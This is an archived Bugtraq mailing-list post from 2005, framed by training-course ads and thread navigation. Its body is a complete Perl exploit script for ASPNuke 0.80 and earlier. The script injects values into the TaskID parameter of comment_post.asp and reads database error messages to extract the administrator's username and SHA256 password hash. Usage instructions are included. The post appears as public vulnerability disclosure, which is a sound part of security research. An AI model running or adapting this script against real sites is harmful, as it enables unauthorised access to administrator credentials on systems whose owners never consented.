Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

SQL Injection Exploit for ASPNuke <= 0.80

from [Alberto Trivero] Network Security [Permanent Link]
Subject: SQL Injection Exploit for ASPNuke <= 0.80
Date: Mon, 27 Jun 2005 19:17:58 +0200 
#!/usr/bin/perl -w
#
# SQL Injection Exploit for ASPNuke <= 0.80
# This exploit retrieve the username of the administrator of the board and
his password crypted in SHA256
# Related advisory:
http://www.securityfocus.com/archive/1/403479/30/0/threaded
# Discovered and Coded by Alberto Trivero

use LWP::Simple;

print "\n\t===============================\n";
print "\t= Exploit for ASPNuke <= 0.80 =\n";
print "\t=     by Alberto Trivero      =\n";
print "\t===============================\n\n";

if(@ARGV!=1 or !($ARGV[0]=~m/http/)) {
   print "Usage:\nperl $0 [full_target_path]\n\nExamples:\nperl $0
http://www.example.com/aspnuke/\n";;
   exit(0);
}

$page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Username")
|| die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/the varchar value '(.*?)' to a column/ && print "[+] Username of
admin is: $1\n";
print "[-] Unable to retrieve Username\n" if(!$1);
$page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Password")
|| die "[-] Unable to retrieve: $!";
$page=~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 hash of
password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

Attachment: aspnuke.pl
Description: Binary data

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • SQL Injection Exploit for ASPNuke <= 0.80, Alberto Trivero <=
Previous by Date:  RE: [Fwd: phpBB 2.0.16 released], Richard Stanway
Next by Date:  MDKSA-2005:106 - Updated spamassassin packages fix DoS vulnerabilities, Mandriva Security Team
Previous by Thread:  Access right escalation / severe permission problems on Raritan Console Servers, spam
Next by Thread:  MDKSA-2005:106 - Updated spamassassin packages fix DoS vulnerabilities, Mandriva Security Team
Indexes:  [Date] [Thread] [Top] [All Lists]